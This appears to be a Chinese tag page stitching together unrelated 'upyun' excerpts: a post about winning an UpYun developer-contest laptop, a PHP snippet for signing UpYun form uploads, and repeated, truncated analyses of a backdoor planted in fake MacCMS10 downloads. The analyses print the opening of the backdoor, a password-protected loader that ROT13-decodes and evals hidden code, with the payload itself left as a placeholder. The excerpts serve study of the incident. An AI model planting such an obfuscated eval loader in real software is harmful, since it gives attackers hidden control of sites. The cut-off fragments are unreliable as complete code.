upyun

收到了 又拍云 从杭州顺丰快递过来的奖品顶配MBP ME294~~ 发文纪念下。 今年4月份的时候， 又拍云 举行了 开发者大赛 ， 然后余兄（upyun余明星)跟我说，你之前做的插件也是可以参赛的，于是，在余兄的鼓励下，我报名参加了开发者大赛。由于工作项目原因，一直到5月底的 时候我才提交代码到gitcafe。 我当时想，比赛嘛，要积极参与，说不定不定可以得个sae云豆或者cherry 键盘啥的。 直到2014年6月25日，大赛获奖结果公布的日期，当我看到upyun将唯一一名特别贡献奖颁发给我时，此时此刻，我感觉到，“幸福来得如此突然”。 辛晓琪不是有一句很流行的歌词，有位哥们喜欢情不自禁地哼起：“ 我以为，我会暴富，但是——我没有!” 那么这次我要把这歌词稍微修改下： “我以为，我会得到幸运奖或入围奖，但是——我没有! 又拍云开发者大赛的评审团奖颁发给我的是“特别贡献奖”。 在此，我要感谢又拍云，感谢这次开发者大赛的各位评委。我这人不太会说话，平常写日志也是聊聊几字，能精简就尽量精简。 我只是一个第三方开发者，我开发的这个插件，在开发之初的想法就是，方便WP用户使用又拍云服务来加速站点的访问。很单纯，没有其它目的，就是兴趣爱好。 我也没想过要向又拍索要礼品什么的。又拍是家很有实力的公司，是的，有实力的公司确实也不少。但是，难能可贵的是，又拍云也是一家对非常开发者友好，并用

之前图片上传到又拍云直接用的是 HTTP FORM API ,今天项目中遇到AJAX上传后图片显示的效果，回过头来想想，跟HTTP FORM API表单提交的过程基本类似，作如下分享，希望有个帮助。 //封装好的公共方法 /** * 获取上传到upyun所需要的配置参数 */ function getUpYunConfig () { //关于upanyun基本配置项就不做细述了，我们这里配置到后台，直接读取 $bucket = ... $form_api_secret = ... $options = array( 'bucket' => $bucket, // 空间名 'expiration' => time() + 600, // 授权过期时间 'save-key' => '/img/{year}/{mon}/{random}{.suffix}', 'allow-file-type' => 'jpg,jpeg,gif,png,doc,pdf,mp3,mp4,amr', ); //policy算法和signature算法具体请参考API文档，不做细述 $policy = base64_encode(json_encode($options)); $sign = md5($policy.'&'.$form_api_secret); /// MD5的操作员密码 return

一、环境 　　Maccms 网站基于php+mysql 的系统，易用性、功能良好等优点，用途范围广 　　打开源码，maccms10\extend\Qcloud\Sms\Sms.php 　　　　　　maccms10\extend\upyun\src\Upyun\Api\Format.php 　　　　 <? php error_reporting ( E_ERROR ); @ini_set ( 'display_errors' , 'Off' ); @ini_set ( 'max_execution_time' , 20000 ); @ini_set ( 'memory_limit' , '256M' ); header ( "content-Type: text/html; charset=utf-8" ); $password = "0d41c75e2ab34a3740834cdd7e066d90" ; //md5加密：WorldFilledWithLove function s (){ $str = "编码之后的恶意代码" ; $str = str_rot13 ( $str ); //对恶意代码进行ROT13编码 m ( $str ); } function m ( $str ){ global $password ; $jj = '' ; eval ( $jj . pack (

（本文仅为平时学习记录，若有错误请大佬指出，如果本文能帮到你那我也是很开心啦） 该复现参考网络中的文章，该漏洞复现仅仅是为了学习交流，严禁非法使用！！！ 一、事件背景 Maccms网站 ：基于PHP+MYSQL环境下运行的完善而强大的快速建站系统，最近Tools上有人曝出有一个冒充了苹果CMS官网的网站提供的MacCMS10存在后门，冒充网站 http://www.maccmsv10.com/download.html cms： 内容管理系统 二、漏洞分析 1.在冒充的“苹果官网”下载MacCMS10版本后，打开源码，找到maccms10.zip\extend\Qcloud\Sms\Sms.php、maccms10.zip\extend\upyun\src\Upyun\Api\Format.php 其中 Smsphp和Format.php的后门木马是一样的，找出一个进行分析 1 <?php 2 error_reporting(E_ERROR);//报错 3 @ini_set('display_errors','Off');//做初始化环境 4 @ini_set('max_execution_time',20000); 5 @ini_set('memory_limit','256M'); 6 header("content-Type: text/html; charset=utf-8

一、环境 　　Maccms 网站基于php+mysql 的系统，易用性、功能良好等优点，用途范围广 　　打开源码，maccms10\extend\Qcloud\Sms\Sms.php 　　　　　　maccms10\extend\upyun\src\Upyun\Api\Format.php 　　　　 <?php error_reporting(E_ERROR); @ini_set('display_errors','Off'); @ini_set('max_execution_time',20000); @ini_set('memory_limit','256M'); header("content-Type: text/html; charset=utf-8"); $password = "0d41c75e2ab34a3740834cdd7e066d90"; //md5加密：WorldFilledWithLove function s(){ $str = "编码之后的恶意代码"; $str = str_rot13($str); //对恶意代码进行ROT13编码 m($str); } function m($str){ global $password; $jj = ''; eval($jj.pack('H*',$str).$jj); //对混淆的PHP代码进行解码